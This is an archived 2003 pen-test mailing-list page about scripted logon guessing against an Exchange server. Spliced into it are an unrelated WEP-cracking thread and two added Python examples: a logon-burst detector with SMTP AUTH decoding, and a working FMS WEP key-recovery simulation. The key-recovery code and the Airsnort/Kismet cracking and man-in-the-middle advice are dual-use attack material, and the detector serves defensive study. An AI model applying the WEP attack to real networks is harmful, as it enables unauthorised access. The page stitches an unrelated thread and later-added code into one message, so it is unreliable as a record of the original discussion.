RE: Strange logon attempts to Win2k server

From: Sean (sean_at_comnet.com)
Date: 09/25/03

  • Next message: Atul Porwal: "How to find PDF Salt"
    To: "Pen-Test" <pen-test@securityfocus.com>
    Date: Wed, 24 Sep 2003 21:50:37 -0600
    
    

    Chris,

    This may be related to what I had found on one of my clients' servers
    recently. Their server was being overloaded by spam that was being sent out
    through Exchange. I knew that they were not running an open relay, and
    quickly ran down the possibilities as to what could have been happening.
    After turning up all the logging, my suspicions were confirmed. The
    spammers had started attempting to authenticate to the Exchange server for
    permission to send mail. They had guessed the passwords for both the
    administrator and backup accounts (yes, they were very poor passwords), and
    were sending massive amounts of spam through the Exchange server. I imagine
    the attempts that you are seeing are this same type of attempted access.

    I guess now spammers are resorting to felony network intrusion to spread
    their pee-pee grow big pills. :)

    -----Original Message-----
    From: Chris Harrington [mailto:cmh@nmi.net]
    Sent: Thursday, September 11, 2003 10:09 AM
    To: pen-test@securityfocus.com
    Subject: Strange logon attempts to Win2k server

    All,

    A customer notified us that someone / something tried to log into one of
    their servers repeatedly but failed. It appears to be some sort of
    script since it tried 6 usernames with 23 passwords in under 2 minutes.
    The event log is a typical 529 event ID. The logon type was 3 (network)
    and the logon process was advapi. I generally see this when someone
    tries to log in to IIS using cleartext authentication. There is no
    evidence in the w3svc logs of these attempts. There were no successful
    logins using that logon process.

    This server is an Exchange server with port 25 accessible from the
    Internet. I have verified this is the only port open by scan and
    firewall rules.

    1. Can anyone access the advapi (or any domain login process) over port
    25 on an Exchange server? I did not think that SMTP AUTH could do that...

    2. What other common programs use the advapi call for authentication?

    The usernames that were tried are webmaster, admin, root, test, master,
    web. Each one was tried in that order with 23 passwords, all failed.

    3. Does anyone know what script / app / virus / worm that could be?

    Any insights??

    Thanks,

    --Chris

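    Two things from this exchange that a practitioner would want to see in
    working form, as an added example that is not part of the original thread
    and not code from any of the posters: detection logic that picks the
    scripted pattern Chris describes (a run of event 529 failures, logon type
    3, logon process advapi, across several account names in under two
    minutes) out of constructed event records, and a constructed SMTP AUTH
    LOGIN session showing how a password guess arrives over port 25 as base64
    text rather than anything encrypted. The pipe-separated event layout, the
    host names, the timings and the SMTP transcript are all assumptions made
    for the example, not data from the thread.

```python
"""Spot scripted logon guessing in Windows Security log records, and show
the SMTP AUTH LOGIN exchange that produces such failures on a mail server.

Added example for the thread, not code from it. Event records, host names
and the SMTP transcript are constructed; the pipe-separated layout is a
hypothetical flat export, not the native Win2k event-log format.
"""
import base64
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_log():
    """Constructed Security log export. Fields:
    time | event id | account | logon type | logon process | workstation
    Event 529 = logon failure (unknown user name or bad password); type 3 =
    network logon."""
    lines = []
    t = datetime(2003, 9, 10, 2, 14, 0)
    # Six accounts tried in order, 23 guesses each, about one per second,
    # all failing through logon process "advapi" as in the original report.
    for user in ["webmaster", "admin", "root", "test", "master", "web"]:
        for _ in range(23):
            lines.append(f"{t:%Y-%m-%d %H:%M:%S}|529|{user}|3|advapi|MAILGW")
            t += timedelta(seconds=1)
    # Two unrelated interactive (type 2) failures: one user mistyping a password.
    lines.append("2003-09-10 09:30:00|529|jsmith|2|User32|WS-FINANCE")
    lines.append("2003-09-10 09:30:40|529|jsmith|2|User32|WS-FINANCE")
    return "\n".join(lines)


def parse_events(text):
    events = []
    for line in text.strip().splitlines():
        ts, eid, user, ltype, proc, host = line.split("|")
        events.append({"time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "event_id": int(eid), "user": user,
                       "logon_type": int(ltype), "process": proc, "host": host})
    return events


def find_guessing_bursts(events, window=timedelta(minutes=2),
                         min_attempts=10, min_users=3):
    """Flag (logon process, workstation) pairs with at least `min_attempts`
    failed network logons spanning `min_users` distinct accounts inside any
    `window`. A user fumbling one password never trips it; a scripted
    user list does. Returns one summary per offending pair."""
    buckets = defaultdict(list)
    for e in events:
        if e["event_id"] == 529 and e["logon_type"] == 3:
            buckets[(e["process"], e["host"])].append(e)
    findings = []
    for (proc, host), evs in buckets.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1  # slide the window forward
            span = evs[start:end + 1]
            if (len(span) >= min_attempts
                    and len({e["user"] for e in span}) >= min_users):
                findings.append({"process": proc, "host": host,
                                 "attempts": len(evs),
                                 "users": sorted({e["user"] for e in evs}),
                                 "first": evs[0]["time"], "last": evs[-1]["time"]})
                break
    return findings


# Constructed SMTP session: AUTH LOGIN against a mail server on tcp/25.
# The 334 challenges are base64 of "Username:" and "Password:"; the client's
# replies are base64 as well, so the guessed credentials are readable on the wire.
SAMPLE_SMTP = """\
S: 220 mail.example.com ESMTP service ready
C: EHLO spamhost
S: 250-mail.example.com Hello
S: 250-AUTH LOGIN
S: 250 OK
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: d2VibWFzdGVy
S: 334 UGFzc3dvcmQ6
C: cGFzc3dvcmQ=
S: 535 5.7.3 Authentication unsuccessful
"""


def decode_auth_login(transcript):
    """Return (username, password, reply code) recovered from an AUTH LOGIN
    exchange, or None if the transcript holds no complete exchange. Each
    failed attempt is one more network logon failure on the Windows side."""
    creds, expecting, code = [], None, None
    for line in transcript.strip().splitlines():
        side, text = line.split(" ", 1)
        if side == "C:" and text.upper() == "AUTH LOGIN":
            expecting = "challenge"
        elif side == "S:" and expecting == "challenge" and text.startswith("334 "):
            expecting = "reply"  # text[4:] decodes to "Username:" / "Password:"
        elif side == "C:" and expecting == "reply":
            creds.append(base64.b64decode(text).decode())
            expecting = "challenge"
        elif side == "S:" and len(creds) == 2 and text[:3] in ("235", "535"):
            code = text[:3]  # 235 = accepted, 535 = rejected
            break
    return (creds[0], creds[1], code) if len(creds) == 2 and code else None


if __name__ == "__main__":
    for f in find_guessing_bursts(parse_events(constructed_log())):
        print(f"{f['process']} from {f['host']}: {f['attempts']} failures across "
              f"{f['users']} between {f['first']:%H:%M:%S} and {f['last']:%H:%M:%S}")
    print("AUTH LOGIN credentials on the wire:", decode_auth_login(SAMPLE_SMTP))
```

    The detector keys on the two things a guessing script cannot hide: many
    failures in a short window and more than one account name from the same
    logon process and source. Thresholds are deliberately low here so the
    constructed sample trips them; tune them against a week of normal logs
    before alerting on them.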
    -----Original Message-----
    From: Bartholomew, Brian J [mailto:BartholomewBJ@state.gov]
    Sent: Monday, July 21, 2003 10:48 AM
    To: 'Ian Chilvers'; pen-test@securityfocus.com
    Subject: RE: V/Scan for Wireless LANs

            I have successfully cracked 40 and 104 bit WEP keys with reinj.c
    and Airsnort or Kismet. Just use Airsnort or Kismet to listen and store
    the "interesting" traffic, and reinj.c to create it. One usually needs
    between 100 MB to 1 GB of traffic to crack the key, but once the data
    is captured, the key cracks in a matter of seconds.

            There is a good paper that describes the weak implementation of
    initialization vectors entitled "Weaknesses in the Key Scheduling
    Algorithm of RC4" by Scott Fluhrer, Itsik Mantin, and Adi Shamir. I
    suggest reading it.

            I mentioned Kismet above. It is one of the best tools out there
    for WLAN testing. It allows you to perform a variety of things to the
    AP such as spoofing, disassociations, capture traffic, sniff out
    "hidden" APs, etc. It is all around a better tool to use than
    NetStumbler since it detects APs passively, instead of broadcasting
    everywhere. It even detects other NetStumbler clients.

            The suggestion to brute force the key is not a good idea since,
    as one person already pointed out, it would take a very long time to BF
    it. It could be done I guess, but by the time the key is cracked, they
    would have probably already changed it.

            Personally I think the best way of attack is to use some sort of
    man in the middle attack. If you are able to disassociate the clients
    from that AP and have them re-associate with you, you are golden :).

    Brian J. Bartholomew
    U.S. Dept of State, Bureau of Diplomatic Security
    Computer Incident Response Team
    (202)663-2304

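    The attack Brian refers to, as an added Python simulation that is not part
    of the original thread and is not code from Airsnort, Kismet or reinj.c.
    WEP seeds RC4 with the 24-bit IV followed by the secret key, and the
    Fluhrer, Mantin and Shamir paper shows that IVs of the form (A+3, 255, X)
    leave the key scheduler in a "resolved" state from which the first
    keystream byte leaks secret byte A roughly 5% of the time. The first
    plaintext byte of a WEP data frame is the 0xAA SNAP header, so that
    keystream byte is known from the ciphertext. The example builds RC4,
    constructs a capture holding the weak IVs for a made-up 40-bit key, tallies
    votes per key byte and confirms candidates with a known-plaintext check (a
    stand-in for the ICV check real tools use). The secret key, the IV set and
    the assumption that every frame starts with 0xAA are constructed for the
    example.

```python
"""FMS-style recovery of a 40-bit WEP key from weak-IV frames.

Added simulation of the Fluhrer-Mantin-Shamir attack; not code from the
thread or any tool it names. The secret key and the "captured" frames are
constructed in code; there is no real capture.
"""

SNAP = 0xAA  # first plaintext byte of an 802.11 data frame (LLC/SNAP DSAP)


def ksa(key):
    """RC4 key scheduling: the permutation S for the given key bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n RC4 output bytes for key (bytes or list of ints)."""
    S = ksa(list(key))
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return out


def capture_weak_iv_packets(secret):
    """Constructed capture: for each key byte index A, all 256 IVs of the weak
    class (A+3, 255, X), paired with the first ciphertext byte of the frame.
    A real capture is dominated by non-weak IVs; fms_vote() filters those."""
    packets = []
    for a in range(len(secret)):
        for x in range(256):
            iv = (a + 3, 255, x)
            z = rc4_keystream(list(iv) + list(secret), 1)[0]
            packets.append((iv, z ^ SNAP))
    return packets


def fms_vote(iv, known, z):
    """Run the KSA for the A+3 steps whose key bytes are known (IV plus the
    secret bytes recovered so far). If the state is 'resolved', return the
    candidate for secret byte A implied by first keystream byte z, else None."""
    a = len(known)
    key = list(iv) + list(known)
    S = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + S[i] + key[i]) % 256
        S[i], S[j] = S[j], S[i]
    if S[1] >= a + 3 or (S[1] + S[S[1]]) % 256 != a + 3:
        return None
    # About 5% of the time z == S[j_next], with j_next = j + S[a+3] + K[a+3],
    # because positions 1, S[1] and a+3 survive the remaining swaps.
    return (S.index(z) - j - S[a + 3]) % 256


def rank_candidates(packets, known):
    """Tally FMS votes for the next secret byte; most-voted value first."""
    votes = [0] * 256
    for iv, c in packets:
        v = fms_vote(iv, known, c ^ SNAP)
        if v is not None:
            votes[v] += 1
    return sorted(range(256), key=lambda b: -votes[b])


def key_matches(packets, key, checks=4):
    """Known-plaintext check standing in for WEP's CRC-32 ICV: the candidate
    must reproduce the SNAP byte on `checks` frames with different IVs."""
    return all(rc4_keystream(list(iv) + list(key), 1)[0] ^ c == SNAP
               for iv, c in packets[:checks])


def recover_key(packets, key_len=5, depth=8):
    """Depth-first search over the top `depth` candidates for each byte,
    verifying every full key. Voting alone is statistical; the search is what
    makes the result reliable. Returns the key as a list of ints, or None."""
    def search(known):
        if len(known) == key_len:
            return known if key_matches(packets, known) else None
        for cand in rank_candidates(packets, known)[:depth]:
            found = search(known + [cand])
            if found is not None:
                return found
        return None
    return search([])


if __name__ == "__main__":
    secret = [0x1A, 0x2B, 0x3C, 0x4D, 0x5E]  # constructed 40-bit WEP key
    packets = capture_weak_iv_packets(secret)
    print("recovered:", recover_key(packets), "expected:", secret)
```

    The simulation hands the attacker every weak IV at once; in the air those
    IVs arrive at random, which is why the message quotes hundreds of
    megabytes of traffic before the key falls out in seconds, and why
    injecting traffic (reinj.c in the message) speeds the capture up.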
    -----Original Message-----
    From: Ian Chilvers [mailto:Ian.Chilvers@prolateral.com]
    Sent: Friday, July 18, 2003 12:45 PM
    To: pen-test@securityfocus.com
    Subject: V/Scan for Wireless LANs

    Hi all

    We've been asked to perform a vulnerability assessment for a company
    that has a Wireless LAN. The W/LAN is running WEP with a random key
    generated, rather than a dictionary word.

    Are there any tools out there that can brute force a WEP key?

    Take this example. A person parks the car in the car park and sniffs
    the air waves with a product like NetStumbler. He discovers the W/LAN
    but with WEP.

    Is there a tool he can use to discover the WEP key (possibly by brute
    force)?

    If there isn't such a tool, how does this sound for an idea.

    Run an app that starts at binary 0's and counts up to 128 bits of 1's. For
    each sequence, listen to see if there are any sensible packets, or even
    send out a DHCP discover request to see if you get a reply. This would
    then possibly give you the WEP key.

    Any comments

    Ian....
